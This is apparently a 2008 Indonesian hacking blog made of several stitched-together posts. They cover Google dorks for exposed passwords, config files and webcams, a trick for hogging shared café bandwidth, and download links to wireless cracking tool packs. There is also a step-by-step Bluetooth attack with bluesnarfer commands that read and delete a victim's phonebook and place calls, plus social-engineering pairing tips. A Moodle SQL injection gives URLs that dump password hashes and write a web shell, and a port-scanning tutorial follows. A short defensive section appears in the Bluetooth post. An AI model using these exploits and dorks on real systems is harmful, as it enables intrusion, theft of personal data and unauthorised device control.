Sabtu, 22 Maret 2008

Google Hacking - Advanced Guide

I am sure you know the situation. When googling for a technical text the search engine will put together a "great offer" of a book eshop or when looking for a specialized forum you will find an advert for holiday in Spain posted on the first place. Today is almost everyone a "SEO expert" (read fucker) and define the desirable enquiry can be tricky. When the enquiry comes out well - you can be surprised by the result :) How to start? Just have a look at Google Help Center - Briefly: Use operator or its combination. Theory.. and what about the reality?

First option is to spend your money on a clever book where you will learn that you will not read there anything that can not be found on internet.
Other option is to find a "place" where they know it and will "share it" :) - Or share their own specialized applications.

The last and best option is to know about projects that run super-structures for Google (yes even such places exist) and they directly generate the right search strings from the key word.

The power of searching (read information) can be demostrated on a simple example.. This shot of a tram accident is not yet in any (TV, radio, internet) news.

--

--
Thanks to the search engine you know about it many hours in advance. Just know how and where to look for it.


Few examples for more advanced Google searching (using).


Filtering:

Page AirDump.Net with out pictures and styling - Filtred version.

eBook:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.txt|.lit|.doc|.rtf|.zip|.rar|.pdf|.chm) "hacking linux"

Music:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma|.ogg) "buena vista"

intitle:"index.of" (mp3|mp4|avi) tricky -html -htm -php -asp -cf -jsp -e-mp3s.eu

Hesla:

inurl:passlist.txt

inurl:password.txt

inurl:config.php

Video:

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mpg|.avi|.wmv|.di) "wep"

Live WebCam

intitle:liveapplet inurl:LvAppl

"powered by webcamXP"

Serial Key, Licence:

"computer profile summary" AND "licence" AND "key:" AND "vista"

--
Term in "..." and (...) can be randomly changed..

Useful operators:

site - searching on pages that contain .cz
Example: site:cz specification "802.11" (for example -cisco -something is filtering surplus of undesirable terms)

cache - searching in cache
intitle - searches in title
filetype - searching of a concrete file type
inurl - searching of a term included in url
allintext - searches text on a concrete page

The virtual space is overfulled with interesting things.. and a description even of the smallest one would cover a lot of pages.

Utils at the end: Google Fight compares the number of using (for example one of two similar) of what ever word in the net.

Database web cameras connectable (configurable) from the internet you will find on pages Opentopia.

Other reading about Hacking Google :)

Useful links and few of torrents at the close.




Hacking bandwith From Mozilla Firefox

Apakah anda pernah bermasalah dengan tragedi tarik-menarik Bandwith antar computer jaringan internet?? weww.. pasti pernah..

Misal Warnet… itu karena tiap bilik/room sudah di batasi bitrate n bandwithnya…
Mungkin Ini bisa jadi Solusi:

1). Buka Browser Mozilla Firefox

2). Pada Address Bar Ketik : about:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah“TRUE”)

contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih


“Toggle” NETWORK.HTTP.PIPELINING TRUE

NETWORK.HTTP.PIPELINING.MAXREQUESTS 64

NETWORK.HTTP.PROXY.PIPELINING TRUE

NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False

4). Buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan [/b]NEW>>INTEGER[/b]

5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0

6). Kemudian REFRESH atau Tekan F5

7). Pada Address Bar Ketik : about:BLANK

Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES

Untuk OS Linux EDIT >> PREFERENCES Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED

9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan


10).Kemudian Tekan OK Lalu REFRESH ( F5 )

11).Masuk Ke Link Ini :
Code: https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125

atau :
Code: https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox


12).Download Software SwitchProxy Tool Versi 1.3.4
Code:

https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125 atau Disini
Code:

https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox 13).

Setelah Selesai Jangan Tekan Tombol UPDATE


14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul

15).Tutup Semua Browser Mozilla FireFox,

16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi

17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.

Sekarang Browser Mozilla Siap Untuk Digunakan……. ::
Message ::
– Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Online
– Hati-hati Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND

Wireless Tools


Level 1:
aerosol.zip Aerosol (0.65)
abappwd.zip ABAP PW Crack
aircrack.zip Aircrack (2.4)
aircrackng.zip Aircrack-NG (0.6.2)
aircrackpack.zip Aircrack Pack
aire.zip Aire (1.0)
airsnort.zip Airsnort
asleap.zip Cisco Leap (1.0)
aptools.zip AP Tools (0.1.0)
cowpatty.zip Cowpatty
netstumbler.zip Netstumbler AP Detection (0.4.0)
weplab.zip WepLab (0.1.5)
Donwload:
http://rapidshare.com/files/25265188/Feliks_wireless_pack.zip

Level 2:[update]
EasyWifiRadar
HotSpotter-0.4
Kismet 2005-08-R1
Wellenreiter-v1.9
wepwedgie-alpha-0.1
Download:
http://rapidshare.com/files/26345803/Feliks_wireless_pack_2.zip

Tambahan:
+ the WireShark download:
http://wireshark.newworldorder.com.es/win32//wireshark-setup-0.99.5.exe

+The wireshark official site:
http://www.wireshark.org/download.html

AttachMent Best:
http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar

Sabtu, 15 Maret 2008

Hacking Bluetooth [n]Security

Art From: echo|zine, volume 4 issue 15

[ 101 A Bluetooth [in]Security ]
[ y3dips ]


---// Pengantar

Bluetooth adalah salah satu teknologi pengganti kabel yang mengkonsumsi
sedikit tenaga listrik, memiliki harga yang relatif murah, berjarak relatif
pendek (10-100m), dan dapat digunakan untuk pertukaran data dan suara.

Riset tentang teknologi "bluetooth" yang telah dilakukan oleh ericsson(tm)
pada tahun 1998 telah memberikan dampak yang cukup besar pada teknologi
"pengganti kabel" atau yang lebih sering aku kenal dengan "wireless technology".
Riset ini Kemudian dilanjutkan oleh sebuah grup yang menamakan dirinya
Special Interest Group dengan "codename" bluetooth dan telah di dukung oleh
banyak perusahaan besar yang berkepentingan dengan teknologi ini. Sehingga
pada tahun 1999 dikeluarkanlah versi pertama (bluetooth ver 1.0) dan versi
yang sekarang digunakan adalah versi 2.0 (merupakan ver 1.2 ditambah EDR).

Teknologi bluetooth sampai saat ini tetap dipakai dan di kembangkan pada
kurang lebih 856 produk[3].

---// Why attacking bluetooth ?

1. Bluetooth dipakai pada peralatan pribadi yang umumnya menyimpan
informasi penting yang bersifat pribadi juga dan menjadikannya
sebagai target yang berharga bagi penyerang

2. Untuk menyerang device bluetooh penyerang tidak perlu untuk melewati
Lapisan firewall, policy, third party security application, IDS/IPS.

3. Bisa ditemukan dibanyak tempat di karenakan layanan ini di pakai
dibanyak "device".

---// Technical Details

- Menggunakan frekuensi 2,4GHz
- 79 channel, dengan lompatan frekuensi 1600 hops/second
- Menggunakan "single chip radio" sehingga harganya relatif murah
- Memiliki "range" 10-100 Meter
- Menggunakan 2.5 mW
- Memiliki Data Rate 1Mbps

---// Bluetooth Mode

-------[ 1. Service mode

a. mode menyala ("on" mode )
Untuk mode "on" terdapat mode "discoverable" dan "un-discoverable",
dimana pada saat discoverable "device" akan dapat dan untuk di temukan
oleh "device" lain. Sedangkan un-discoverable mode mengakibatkan
secara umum tidak dapat di temukan oleh "device" lain.

b. mode tidak menyala ( "off" mode )
Layanan bluetooth mati pada mode ini

c. mode otomatis ( "automatic" mode )
Layanan ini akan memudahkan aplikasi untuk menggunakan layanan bluetooth

-------[ 2. Security mode

a. Security mode level 1
Tidak ada mode sekuriti sama sekali

b. Security mode level 2
Sekuriti terdapat pada level "service", tetapi pada level "device"
tidak ada terdapat.

c. Security mode level 3

Sekuriti terdapat pada level "device" dan menerapkan sekuriti pada
setiap level yang lebih rendah.

---// Bluetooth Security threat

-------[ 1. Bluejacking

Teknik ini dilakukan dengan cara mengirimkan pesan/gambar/nomer
telpon tanpa ijin kepada target, tujuannya adalah mulai dari perbuatan
iseng sampai pada "social engineering" untuk memancing target melakukan
pairing kepada "device" penyerang.

-------[ 2. Bluesnarfing

Teknik ini mengijinkan penyerang untuk terhubung ke "device" milik
target tanpa diketahui pemiliknya dan akan mengakibatkan penyerang
dapat mengakses data data penting yang tersimpan didalam "device" target
seperti daftar nomer telepon (buku telepon), "business card", "images"
bahkan IMEI (International Mobile Equipment Identity ) yang dapat
mengakibatkan nomer tersebut untuk di "clonning".

-------[ 3. BlueBugging

Teknik ini mengakibatkan "device" target dan penyerang terhubung secara
serial dan mengakibatkan penyerang memiliki kendali penuh terhadap
"device" target sehingga penyerang juga dapat mengeksekusi set perintah AT
(ASCII Terminal) diantaranya untuk melakukan panggilan, mengirim dan
membaca SMS, melakukan koneksi jaringan bahkan internet melalui "device"
target sampai kepada "identity theft".

-------[ 4. BlueSmack

Teknik ini melakukan serangan Denial Of Service terhadap device target, salah
satu caranya adalah memanfaatkan perintah l2ping pada protokol L2CAP.

-------[ 5. Backdoor Attack

Teknik ini adalah dengan memanfaatkan "pairing" yang telah tercipta antara
"device" target dan penyerang. Memanfaatkan Kelengahan Target dan Teknik
social engineering.


---// Basic Penetration

Berikut akan aku lakukan penetrasi mendasar terhadap bluetooth sekuriti,
dengan harapan akan memberikan pemahaman mendalam tentang ini.

-------[ 0. Info

Target : Mobile phone Sony ericsson t68i
Penyerang : Toshiba tecra 8100
Linux Ubuntu 5.10 Operating system
USB bluetooth dongle with Bluez

Tools : Bluesnarfer
Bluez-utils
RedFang

-------[ 1. Preparation

Sekarang lakukan checking terhadap bluetooth device (USB dongle) menggunakan
hciconfig (packet Bluez)

//--- command ----//

y3dips@hogwartz:~$ hciconfig -a hci0
hci0: Type: USB
BD Address: 00:09:DD:10:4E:B1 ACL MTU: 192:8 SCO MTU: 64:8
UP RUNNING PSCAN ISCAN
RX bytes:394 acl:0 sco:0 events:18 errors:0
TX bytes:319 acl:0 sco:0 commands:17 errors:0
Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'hogwartz-0'
Class: 0x3e0100
Service Classes: Networking, Rendering, Capturing
"device" Class: Computer, Uncategorized
HCI Ver: 1.1 (0x1) HCI Rev: 0x460 LMP Ver: 1.1 (0x1) LMP Subver: 0x460
Manufacturer: Cambridge Silicon Radio (10)

//--- command ----//

didapatkan beberapa informasi penting, diantaranya:
1. Type: USB
2. BD Address: 00:09:DD:10:4E:B1
3. Service Classes: Networking, Rendering, Capturing

Baiklah, ternyata "device" berjalan baik dan dikenali oleh system.

-------[ 2. Scanning

Setelah semua persiapan berjalan dengan baik maka selanjutnya adalah menemukan
target, untuk mendeteksi layanan bluetooth yang aktif (mode menyala) dan
juga "discoverable", aku hanya menggunakan hcitool (paket Bluez)

//--- command ----//

y3dips@hogwartz:~$ hcitool scan
Scanning ...
00:0A:D9:49:B6:8B T68i
00:0C:55:FF:F3:B6 heaven-0
00:D5:F9:33:B6:A4 dodlesvck
00:60:57:44:56:B3 6310i

//--- command ----//

Yupe, aku menemukan ada 4 buah "device"yang mengaktifkan layanan bluetoothnya.
dan aku putuskan untuk bereksplorasi satu persatu, untuk itu aku putuskan
akan melakukan penetrasi sesuai urutan :)

Selanjutnya adalah melakukan perkenalan lebih jauh dengan "device" tersebut,
dan untuk ini digunakanlah sdptool (paket bluez) untuk melakukan browsing
dan secara spesifik aku tambahkan options "grep" khusus untuk menemukan
service apa saja yang di layani oleh "device" tersebut, "device" akan di kenali
dengan alamat bluetooth.

dalam hal ini untuk "device" pertama adalah 00:0A:D9:49:B6:8B

//--- command ----//

y3dips@hogwartz:~$ sdptool browse 00:0A:D9:49:B6:8B | grep Service\ Name
Service Name: Dial-up Networking
Service Name: Fax
Service Name: Voice gateway
Service Name: Serial Port 1
Service Name: Serial Port 2
Service Name: OBEX Object Push
Service Name: IrMC Synchronization
Service Name: Voice gateway

//--- command ----//

Dan kita dapatkan bahwa device tersebut memberikan service Dial-up Networking,
Fax, Voice Gateway, Serial Port, OBEX, IrMC.

Untuk melakukan cek hubungan dengan device maka kita dapat melakukan ping.

//--- command ----//

y3dips@hogwartz:~$ sudo l2ping 00:0A:D9:49:B6:8B
Ping: 00:0A:D9:49:B6:8B from 00:09:DD:10:4E:B1 (data size 44) ...
0 bytes from 00:0A:D9:49:B6:8B id 0 time 46.69ms
0 bytes from 00:0A:D9:49:B6:8B id 1 time 31.24ms
0 bytes from 00:0A:D9:49:B6:8B id 2 time 37.95ms
0 bytes from 00:0A:D9:49:B6:8B id 3 time 33.01ms
0 bytes from 00:0A:D9:49:B6:8B id 4 time 48.04ms
5 sent, 5 received, 0% loss

//--- command ----//

-------[ 3. Owning

Setelah melakukan Scanning dan mendapatkan alamat target dan informasi
mengenai service yang dilayani oleh device tersebut maka selanjutnya kita
akan melakukan "snarfing" terhadap bluetooth device (Bluesnarfing).

Salah satu erangan yang mungkin adalah membaca buku telepon dari device
dengan menggunakan bluesnarfer.

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
+ 1 - My Sephia /M : 08883535266
+ 3 - Mbah Marijan/W : 021454545
+ 5 - Osama Laden/W : 662224258
+ 7 - Warung Pecel Bu Roso/W : 0214545889
+ 9 - Superman/W : 911
bluesnarfer: release rfcomm ok

//--- command ----//

Selanjutnya kita juga dapat menghapus buku telepon

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -w 1-10
"device" name: T68i
delete of entry 1 successfull
delete of entry 2 successfull
delete of entry 3 successfull
delete of entry 4 successfull
delete of entry 5 successfull
delete of entry 6 successfull
delete of entry 7 successfull
delete of entry 8 successfull
delete of entry 9 successfull
delete of entry 10 successfull
bluesnarfer: release rfcomm ok

memeriksa apakah sudah terhapus

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10
"device" name: T68i
bluesnarfer: release rfcomm ok

//--- command ----//

Selain itu aku akan mencoba melakukan Bluebugging dengan cara mengeksekusi
perintah AT, dalam hal ini ATD (melakukan panggilan)

//--- command ----//

y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -c 'ATD555;'
"device" name: T68i
custum cmd selected, raw output
OK
bluesnarfer: release rfcomm ok
y3dips@hogwartz:~/Desktop/bluetooth/pentest/snarf$

//--- command ----//

Tapi ingat, dengan melakukan panggilan ini maka akan tampak pada layar target
bahwa sednag melakukan panggilan terhadap nomer tertentu. (Sehingga sebaiknya
dalam melakukan panggilan pada saat target tidak berinteraksi langsung dengan
device)

---// 31337 penetration

-------[ 1. Backdooring

Teknik Backdooring ini bisa dilakukan dengan cara berinteraksi secara langsung
ataupun tidak, teknik ini bertujuan membuat "device" target melakukan "pairing"
dengan device penyerang.

Social enggineering berperanan penting pada teknik ini.

Example

a. Berinteraksi langsung

Seperti teknik social engineering yang pada umumnya dilakukan adalah
dengan cara berinteraksi secara langsung dengan device target.

real life example:

Ingat, perubahan kartu SIM, menghidupkan dan mematikan Device tidak
menghapus pairing yang telah terbuat, celah ini membuat aku berpura-pura
kehabisan batere handphone dan meminjam handphone target untuk mengirim
sms, agar target semakin yakin maka aku gunakan nomer yang aku miliki
(agar lebih meyakinkan lagi maka sebiknya handphone kamu emang tidak
bisa menyala), setelah itu cobalah lakukan pairing kedevice kamu, sebelum
itu ada 2 hal yang harus aku lakukan

1. menentukan PIN untuk diisikan dari handphone target

//--- command ----//
root@hogwartz:~# echo "4321" > /etc/bluetooth/pin
//--- command ----//


2. Dan kamu perlu membaca syslog untuk mengetahui alamat target
yang terhubung.

//--- command ----//
root@hogwartz:~# tail -f /var/log/syslog | grep hcid
Aug 21 20:25:30 localhost hcid[8880]: pin_code_request \
(sba=00:09:DD:10:4E:B1, dba=00:0A:D9:49:B6:8B)
//--- command ----//

ya, dan sekarang aku tinggal matikan handphone dan tukar kartu SIM kembali,
selanjutnya tinggal bereksplorasi di "device" target.

b. Berinteraksi Tidak langsung

Cara kedua ini dikombinasikan dengan teknik BlueJacking, pada cara ini
aku hanya perlu mengirimkan gambar/text/lagu/ atau apapun ke device
target sehingga target akan melakukan cek terhadap info device pengirim
yang tampil pada "device" target dan jika target berniat menerima
gambar/text/lagu/ tersebut maka dia harus melakukan pairing dan perlu
memasukan sebaris PIN.

(nama device; yang bisa di definisikan pada deviceku), Karena karakter
di beberapa "device", jumlah karakter tidak dibatasi maka memungkinkan
kita untuk menuliskan sebaris kalimat yang "membujuk" (inti social
engineering) seperti "FOTO NADINE NIH?" atau "UNTUK MENERIMA KETIKKAN
4321"

Selanjutnya tinggal tunggu hasil pairing kita :).


-------[ 2. Detecting the undetected

Baiklah, sekarang bagaimana kalau "device" tersebut tidak di set discoverable
sehingga aku akan kesulitan mendapatkan alamat device, dan aku pun tidak mungkin
meminjam handphone ("device") target karena satu dan lain hal (pelit mungkin:P).

Beruntunglah aku dikarenakan ada satu tools yang dipublikasikan dengan nama
"redfang" dan mampu mendeteksi "device" bluetooth yang menyalakan layanannya
tetapi tidak di set discoverable.

//--- command ----//

y3dips@hogwartz:~/bt/fang$ sudo ./redfang -r 000AD949B689-000AD949B68D
redfang - the bluetooth hunter ver 2.5
(c)2003 @stake Inc
author: Ollie Whitehouse
enhanced: threads by Simon Halsall
enhanced: "device" info discovery by Stephen Kapp
Scanning 5 address(es)
Address range 00:0a:d9:49:b6:89 -> 00:0a:d9:49:b6:8d
Found: T68i [00:0a:d9:49:b6:8b]
Getting "device" Information.. Failed.

//--- command ----//

Dan akupun mendapatkan alamat target. :), salah satu kelemahannya adalah
kecepatannya dalam menemukan adalah sangat lambat, aku sering menggunakan
options "-t" untuk meningkatkan waktu timeout dan mempercepat scanning.
atau bisa melakukan "recursive execute". (automated ? -- in proggress)


---// Mitos dalam "bluetooth [in]security"

[1] Matikan saja layanan Bluetoothnya niscaya akan aman

Mematikan layanan bluetooth ("off" mode) pada "device" tidaklah 100%
akan membuat "device" aman. Serangan yang mungkin dilakukan adalah
Social engginering dan Malicious program (virus, worm & trojan)
yang dapat secara otomatis menyalakan layanan bluetooh ("on" mode)
atau bahkan melakukan pairing/backdoor attack ke bluetooth "device".

Jadi perkuat device anda dengan firewall dan juga antivirus

[2] Di Buat "[un]discoverable" akan aman

Lihat sub-chapter "31337 penetration" pada bagian kedua "Detecting
the undetected"

[3] Tidak ada informasi penting di bluetooth "device"

Salah, ambil contoh "mobile "device" (phone, smart phone, laptop)"
Hampir seluruh data penting tersimpan, misalkan mobile phone, disana
terdapat seluruh nomer nomer yang penting bagi anda meskipun anda
tidak termasuk orang penting :P.

[4] Jaraknya pendek

Jarak bluetooth device umumnya pendek 10-100 Meter, tetapi dengan
adanya teknik untuk memperkuat signal[6] maka jangkauan pun bisa
di perjauh bahkan sampai 1 km.

[5] Penyerangnya pasti akan tampak "aneh" dan "mencurigakan" [karena membawa
-bawa laptop dan bluetooth device yang di modifikasi (perkuat sinyal)?]

Tidak juga, bahkan sekarang via mobile phone/PDA (java supported)
bisa melakukan "assessment"[2].

---// Bertahan ?

[1] Update informasi anda tentang "device" anda (khususnya soal security)
[2] Update Frimware anda, jikalau termasuk "device" yang di curigai
[3] Periksa daftar "trusted Pair", hapus yang sudah tidak dibutuhkan, hindari
backdoor attack
[4] Gunakan Fitur keamanan tambahan (eg: Antivirus, Firewall)
[5] Untuk meminimalisir serangan matikan layanan bluetooth anda jika tidak
digunakan
[6] Jikapun dibutuhkan, buatlah PIN yang relatif kuat.
[7] Pastikan untuk tidak sembarangan melakukan koneksi/pairing (eg: terima
file dari "unknown device")


---// Clue

Sebagian handphone memiliki celah terserang teknik bluesnarfing ataupun
bluebug saat visible (discoverable) dan sebagian lainnya non-visible
(non-discoverable), sementara beberapa jenis lainnya tidak vulnerable
kecuali dengan menggunakan backdoor attack dan teknik bluejacking
(Social engineering)

---// Kamus

Pairing adalah suatu bagian (state) yang dilakukan apabila dua buah
"device" setuju untuk berkomunikasi satu sama lainnya, setelah state
ini terjadi maka apabila ingin terjadi komunikasi ulang maka akan
membypass proses pencarian (discovery) dan otentikasi (authentication)
yang biasa terjadi pada saat interaksi.

---// Referensi ( echo.or.id - Ammar )

[1] y3dips, "Owned a mobile "device" via bluetooth", dipresentasikan dan
didemokan pada "Cryptography and Wireless security seminar", 2006
[2] Trifinite official site`s. http://trifinite.org
[3] SIG. http://bluetooth.org
[4] http://thebunker.net
[5] wikipedia. http://en.wikipedia.org
[6] bluesniper. http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/

---// Greetz

BUG on moodle PHP

-- Security Internet

Manual Testing Notes
to view user/admin password hashes:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127. 0.0.1&user='or%20isnull(1/0)/* to inject a shell:

http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0 .0.1&user='UNION %20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, '%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../ ../w ww/moodle/shell.php'%20FROM%20mdl_user/*

Solution Description
Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Vulnerability classification:
- Remote vulnerability
- Input manipulation attack
- Impact on integrity
- Exploit available
- Verified

Second checking :
http://www.milw0rm.com/exploits/1312


OK,
Thank you

Scanning Networks / Cek jaringan

Scanning helps one to know what services are running on a machine. This will show the open ports on which services are listening for connections. First we will determine whether the target machine is alive or not. This can be done by sending a icmp echo request packet to the server. The server would respond with a icmp echo reply showing that it’s alive. The process to do this on a range of hosts or ipaddresses is known as ping sweep. Of the many methods used, we will look on ICMP ping and echo port ping.

ICMP ping

Your machine will send an icmp echo request (type 8) to the target machine and it would respond with an icmp echo reply(type 0) if it is alive. You can use the Unix ping command to do this:

[root@ns2 root]# ping -c 3 66.218.71.86
PING 66.218.71.86 (66.218.71.86) from 203.41.193.140 : 56(84) bytes of data.
64 bytes from 66.218.71.86: icmp_seq=1 ttl=51 time=207 ms
From 203.41.193.137: icmp_seq=2 Redirect Host (New nexthop: 202.5.165.81)
64 bytes from 66.218.71.86: icmp_seq=2 ttl=51 time=204 ms
64 bytes from 66.218.71.86: icmp_seq=3 ttl=51 time=203 ms

--- 66.218.71.86 ping statistics ---
3 packets transmitted, 3 received, 0% loss, time 2019ms
rtt min/avg/max/mdev = 203.938/205.171/207.287/1.503 ms
[root@ns2 root]#

At the end it will give you a summary, showing statistics of number of packets received and sent and the %age of packet loss.

Echo port ping

This makes use the echo service running on the target machine which runs on port 7. Whatever you send it, will be echoed back to you. So if you see that it echoed back what you sent, then you can be sure that the target machine is alive.

Two interesting tools on Linux is Fping and Nmap

Fping

Fping sends multiple icmp request packets simultaneously and processes the reply as they occur. This makes ping sweeps faster. Fping can be feeded with an ipaddress or can be given a list of ipaddress on a file.

[root@Krishna]# fping -a -g 203.122.1.0 203.122.1.80
203.122.1.9
203.122.1.26
203.122.1.37
203.122.1.47
203.122.1.54
203.122.1.42
203.122.1.68
203.122.1.80
[root@Krishna]#

Type fping -h for a full listing of available options.

Nmap

Nmap is a powerful tool that can do a lot more than ping sweep.
To use nmap for ping sweeping use the –sP argument.
[root@ns2 root]# nmap -sP 203.122.58.0/24

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (203.122.58.1) appears to be up.
Host (203.122.58.2) appears to be up.
Host (203.122.58.5) appears to be up.
Host (203.122.58.6) appears to be up.
Host (203.122.58.9) appears to be up.
Host (203.122.58.10) appears to be up.
Host (203.122.58.13) appears to be up.
Host (203.122.58.14) appears to be up.
caught SIGINT signal, cleaning up
[root@ns2 root]#

If ICMP is blocked on the firewall of the target machine, additional techniques can be used to determine whether systems are alive.
Nmap provides a advanced option called TCP ping scan. It is initiated with the argument –PT with a port number such as port 80, since packets to this port is allowed by many firewall and border routers to the systems on their demilitarized zone (DMZ).

[root@ns2 root]# nmap -sP -PT80 203.122.58.0/24

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Host (203.122.58.1) appears to be up.
Host (203.122.58.2) appears to be up.
Host (203.122.58.5) appears to be up.
Host (203.122.58.6) appears to be up.
Host (203.122.58.9) appears to be up.
Host (203.122.58.10) appears to be up.
Host (203.122.58.13) appears to be up.
Host (203.122.58.14) appears to be up.
caught SIGINT signal, cleaning up
[root@ns2 root]#

Icmpenum

This tool from Simple Nomad (http://www.nmrc.org/project/misc/icmpenum-1.1.1.tgz) .
Even if the border router or firewall blocks ICMP echo packets , the systems status of being alive can be determined by looking for a different ICMP type, like icmp time stamp request and icmp info requests.
[krishna]# icmpenum –i2 –c 192.168.1.0

In the above example, we enumerated the entire 192.168.1.0 class C network using an icmp time stamp request . Icmpenum can send spoofed packets to avoid detection. Use the s argument to send spoofed packets and passively listen for responses with the p switch.

Icmpquery


Icmpquery can be found at http://packetstormsecurity.com/UNIX/scanners/icmpquery.c
Ping sweeps makes use of icmp echo packets , but there are a lot more types of icmp packets which can be used to gather valuable information about the system. For example you can request the time ona system by sending an ICMP type 13 message (TIMESTAMP) and you can request the netmask of a particular device with the ICMP type 17 message (ADDRESS MASK REQUEST).
To query a routers time, you can run the command:
[root@ns2 files]# ./icmpquery -t 213.206.75.252
213.206.75.252 : Sun Jun 8 16:46:30 2003
[root@ns2 files]#

and to query a routers netmask, use

[Krishna]# icmpquery –m 213.206.75.252

Windows tools:


To do ping sweeps in windows, try the freeware pinger from Rhino9 (http://nmrc.org/snt). Some other tools for windows are Ping Sweep from Solarwinds (http://www.solarwinds.net)
WS_Ping ProPack (http://www.ipswitch.com) NetScan Tools (http://www.nwpsw.com)

Port Scanning:


Port scanning is the process of connecting to TCP and UDP ports on the target system to determine what services are running or in a listening state. Identifying listening ports is essential to determine the type of operating system and application in use on the system.

Types of port scanning:

1.) TCP connect scan: This type of scan connects to the target port and completes a full three way handshake (SYN, SYN/ACK and ACK).
2.) TCP SYN scan: This is also called half-open scanning because it does not complete the three-way handshake, rather a SYN packet is sent and upon receiving a SYN/ACK packet it is determined that the target machines port is in a listening state and if an RST/ACK packet is received , it indicates that the port is not listening.
3.) TCP FIN scan: This technique sends a FIN packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.
4.) TCP Xmas Tree scan: This technique sends a FIN,URG and PUSH packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.
5.) TCP Null scan: This technique turns off all flags and based on RFC 793 , the target system should send back an RST for all closed ports.
6.) TCP ACK scan: This technique is used to map out firewall rulesets. It can help determine if the firewall is a simple packet filter allowing only established connections or a stateful firewall performing advance packet filtering.
7.) TCP Windows scan: This type of scan can detect both filtered and non-filtered ports on some systems due to anomaly in the way TCP windows size is reported.
8.) TCP RPC scan: This technique is specific to UNIX systems and is used to detect and identify Remote Procedure Call (RPC) ports and their associated program and version number.
9.) UDP scan: This technique sends a UDP packet to the target port. If the target ports responds with an “ICMP port unreachable” message, the port is closed, if not then the port is open. This is a slow process since UDP is a connectionless protocol, the accuracy of this technique is dependent on many factors related to utilization of network and system resources.

We will now discuss some of the more popular and time proven port scanners.
Strobe


Download it from ftp://ftp.rpmfind.net/linux/redhat/7.1/en/powertools/i386/RedHat/RPMS/strobe-1.04-8.i386.rpm

It is one of the fastest and most reliable TCP scanners, it can also grab the associated banner of a particular port. Strobe is a TCP scanner and does not provide UDP scanning capability, as such it can be easily detected by the target machine.

[root@ns2 files]# strobe 213.206.75.252
strobe 1.04 (c) 1995-1997 Julian Assange (proff@suburbia.net).
213.206.75.252 21 ftp File Transfer [Control] [96,JBP]
-> 220-FTP server ready.
-> 220 Only anonymous FTP is allowed here
213.206.75.252 80 http www www-http World Wide Web HTTP
www World Wide Web HTTP [TXL]
[root@ns2 files]#

For a UDP port scanner try udp_scan by SATAN(Security Administrator Tool for Analyzing Networks).

Netcat


This is known to be called the Swiss army knife in security toolkit. It provides both TCP and UDP scanning capabilities. The -v and -vv options provide verbose output, the -z option is used for port scanning, and the -w2 option provides a timeout value for each connection. By default nc uses TCP ports, the -u option is so used to specify UDP scanning.

[root@ns2 files]# nc -v -z -w2 203.122.61.154 1-140
ns2.spectra.com [203.122.61.154] 111 (sunrpc) open
ns2.spectra.com [203.122.61.154] 80 (http) open
ns2.spectra.com [203.122.61.154] 53 (domain) open
ns2.spectra.com [203.122.61.154] 23 (telnet) : No route to host
[root@ns2 files]#

[root@ns2 files]# nc -u -v -z -w2 203.122.61.154 1-140
ns2.spectranet.com [203.122.61.154] 132 (?) open
ns2.spectranet.com [203.122.61.154] 131 (?) open
ns2.spectranet.com [203.122.61.154] 130 (?) open
ns2.spectranet.com [203.122.61.154] 129 (?) open
ns2.spectranet.com [203.122.61.154] 128 (?) open
ns2.spectranet.com [203.122.61.154] 127 (?) open
